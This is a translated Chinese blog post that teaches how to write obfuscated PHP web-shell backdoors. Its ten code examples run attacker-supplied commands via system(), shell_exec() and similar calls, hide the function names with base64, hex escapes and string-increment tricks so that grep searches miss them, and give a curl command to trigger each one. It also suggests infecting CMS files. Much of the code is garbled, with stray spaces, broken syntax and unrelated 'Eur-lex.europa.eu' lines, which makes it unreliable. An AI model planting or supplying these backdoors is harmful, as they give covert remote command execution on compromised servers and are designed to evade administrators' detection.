前言
最近我研究了一种不寻常的小技巧,特地撰写这篇文章来与大家分享。这篇文章提供了许多后门代码中使用的exit()基础知识,开箱即用。
这篇文章的关注点在于全局变量GET,POST,REQUEST。
最常用的函数
(PHP 4, PHP 5, PHP 7)
shell_exec - Execute command via shell and return the complete output as a string
string shell_exec (string $ cmd)
EXEC-> php -r 'shell_exec ("ls -la");'
(PHP 4, PHP 5, PHP 7)
system - Executes an external program and shows the output
string system (string $ command [, int & $ return_var])
EXEC-> php -r 'system ("ls -la");'
(PHP 4, PHP 5, 7 PHP)
exec - Execute external program
string Exec (Command String $ [, $ & array output [int & return_var $]])
EXEC-> php -r 'exec ("ls -la", $ var); print_r ($ var);'
(PHP 4, PHP 5, PHP 7)
passthru - Execute an external program and show the raw output
void passthru (string $ command [, int & $ return_var])
EXEC-> php -r 'passthru ("ls -la", $ var); '
简单的应用
shell_exec:
if (isset ($ _ REQUEST ['cmd'])) {$ cmd = shell_exec ($ _ REQUEST ['cmd']);
print_r ($ cmd);}
system:
if (isset ($ _ REQUEST ['cmd'])) {system ($ _ REQUEST ['cmd']); }
exec:
if (isset ($ _ REQUEST ['cmd'])) {exec ($ _ REQUEST ['cmd']); }
passthru:
if (isset ($ _ REQUEST ['cmd'])) {passthru ($ _ REQUEST ['cmd']); }
我们可以使用相同的函数,但要精心设计,避免使用简单的“grep-E”来显示我们的访问权限。
TIPS
在固定值中使用shellcode
可以不加节制地使用数组
本地函数的连接和变量的定义
base64_decode - encode (data), bin2hex, error_reporting (0)
使用系统上已存在的请求(GET或POST)。
研究恶意属性在系统类中的创建,创建其函数。
处理全局变量$ _SERVER的值。
研究PHP格式CMS文件的感染方法。
示例
示例01
c3lzdGVt = system, dW5hbWUgLWE7bHM7 = uname -a; ls; , aWQ = = id
CODE:
(error_reporting (0)) ($ __ = @ base64_decode ("c3lzdGVt")) $ __ ( base64_decode ("aWQ ="))
. define ("_", "dW5hbWUgLWE7bHM7"). __ ( base64_decode (_)). exit );
执行:
curl -v ‘http://localhost/shell.php'
示例02
c3lzdGVt = system
CODE:
(error_reporting (0) (= @ $ __. base64_decode ( "c3lzdGVt"))
. print ($ __ ( Isset ($ _REQUEST [0]) REQUEST $ _ [0] NULL))?. EXIT );
执行:
curl -v ‘http://localhost/shell.php?0=id'
示例03
ZWNobyhzaGVsbF9leGVjKCRfKSk7 = echo (shell_exec ($ _));
CODE:
( Error_reporting (0)) ($ _ = $ _ REQUEST [0]).
($ __ = @. Create_function ( '$ _' base64_decode ( "ZWNobyhzaGVsbF9leGVjKCRfKSk7"))) ($ __ ($ _) exit..);
执行:
curl -v ‘http://localhost/shell.php?0=id'
示例04
$ _GET [1] = Function name, $ _GET [2] = command that will execute
CODE:
( Error_reporting (0) (= @ $ _ $ _ GET [1]) (.. $ _ ($ _GET [2])). EXIT );
执行:
curl -v ‘http://localhost/shell.php?1=system&2=id;uname'
示例05
$ _REQUEST [1] = Function name, $ _REQUEST [2] = command that will execute
CODE:
( error_reporting (0)). ( extract ($ _REQUEST, EXTR_PREFIX_ALL))
($ _ = @ get_defined_vars () ['_ REQUEST']) ( define ('_', $ _ [2])) (($ _ [1] (_));
示例06
函数:
SFRUUF9VU0VSX0FHRU5U = HTTP_USER_AGENT
CODE:
( error_reporting (0)). ($ _ = @ explode (',', $ _ SERVER [ base64_decode ('SFRUUF9VU0VSX0FHRU5U')]))
($ _ [0] ("{$ _ [1]")). exit ;
示例07
函数:
\x30=0, \x73=s, \x79=y, \x73=s, \x74=t, \x65=e, \x6D=m
CODE:
( error_reporting (0)). ($ _ [0] [] = @ $ _ GET ["\ x30"])
($ _ [1] [] = "\ x73") ($ _ [1] [] = "\ x79").
($ _ [1] [] = "\ x6D") ($ _ [1] [] = "\ x65").($ ___. = $ __ [0])
($ __ = @ get_defined_vars () ['_'] [1])
($ ___. = $ __ [1]) ($ ___. = $ __ [2]) ($ ___. = $ __ [3])
. ($ = ___ __ $ [4].) ($ = $ __ ___ [5].) (($ ___ ( "{$ _ [0] [0]}"))... EXIT );
Execution: curl -v ‘http://localhost/shell.php?0=id;uname%20-a'
示例08
$ _REQUEST [0] = Command that will execute
CODE:
( error_reporting (0)). ( str_replace ('$', '@', '#')
, 's $ ## and @ # $ @ # $ @ # $ @ s $ # $ @ # $ ($ _ {$ _ REQUEST [0]}));
执行:
curl -v ‘http://localhost/shell.php?0=id
示例09
函数:
$ _POST [‘shellrox’] = Command that will execute
CODE:
( error_reporting (0)). ($ _ = [("\ x73 \ x79").
("\ x74 \ x65 \ x6d"), "\ x73 \ x68 \ x65 \ x6c", "\ x6c \ x72 \ x6f \ x78"
($ _ [0] ($ _ POST [$ _ [1]. $ _ [2]]));
执行:
curl -d “shellrox=id;uname -a” -X POST ‘http://localhost/shell.php'
示例10
函数:
$ _ = ""; # we need a blank string to start
Eur-lex.europa.eu eur-lex.europa.eu # access part of the string to convert to an array
$ _ = $ _. ""; # convert the array into a string of "Array"
Eur-lex.europa.eu eur-lex.europa.eu # access the 0 index of the string "Array" which is "A"
# INCREASING VALUES TO FIND THE LETTERS
# IF YOU WANT TO MOUNT THE STRING SYSTEM
($ _ ++); #THE
($ _ ++); #B
($ _ ++); #W
($ _ ++); #D
# FIRST LETTER FOUND IS PLAYED IN A SECONDARY ARRAY
($ ___ [] = $ _ ++);
($ _ ++); #F
($ _ ++); #G
($ _ ++); #H
($ _ ++); #I
($ _ ++); #J
($ _ ++); #K
($ _ ++); #L
# FINISHED LETTER IS PLAYED IN A SECONDARY ARRAY
($ ___ [] = $ _ ++); # M
($ _ ++); #N
($ _ ++); #O
($ _ ++); #P
($ _ ++); #Q
($ _ ++); #R
# FINISHED LETTER IS PLAYED IN A SECONDARY ARRAY
($ ___ [] = $ _ ++);
# FINISHED LETTER IS PLAYED IN A SECONDARY ARRAY
($ ___ [] = $ _ ++); # T
($ _ ++); #U
($ _ ++); #V
($ _ ++); #W
($ _ ++); #X
# FINISHED LETTER IS PLAYED IN A SECONDARY ARRAY
($ ___ [] = $ _ ++);
(Z)
# ARRAY DEBUG:
/ * Array
(
[0] => E
[1] => M
[2] => S
[3] => T
[4] => Y
)
* /
# MOUNT STRING WITH ARRAY FIELDS $ ___
$ ___ [2]. $ ___ [4]. $ ___ [2]. $ ___ [3]. ___ [0]. ___ [1];
# USING ANONYMOUS FUNCTION TECHNIQUE FOR IMPLEMENTATION
$ _____ ('id; uname -a');
极简版本(MINIMALIST VERSION:)
($ _ = $ _ [+] "). ($ _ ++). ($ _ = $ _.
($ _ ++). ($ _ ++). ($ _ ++) ($ _ ++).
($ _ ++). ($ _ ++). ($ _ ++). ($ _ ++).
($ _ ++). ($ _ ++). ($ _ ++). ($ _ ++).
($ _ ++). ($ _ ++). ($ _ ++).
($ ___ [] = $ _ ++). ($ _ ++)
(_____ = $ ___ [2]. $ ___ [4]. ___ [2]. ___ [3]. ___ [0]. ___ [1])
($ _____ ('id; uname -a'));
Execution: curl -v 'http://localhost/shell.php'
注意:还有成千上万的技巧,接下来我会一一撰写文章与大家分享。
参考
翻译来源:https://medium.com/@th3law/hold-the-shit-php-backdoor-for-fun-196c202c8cbf
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
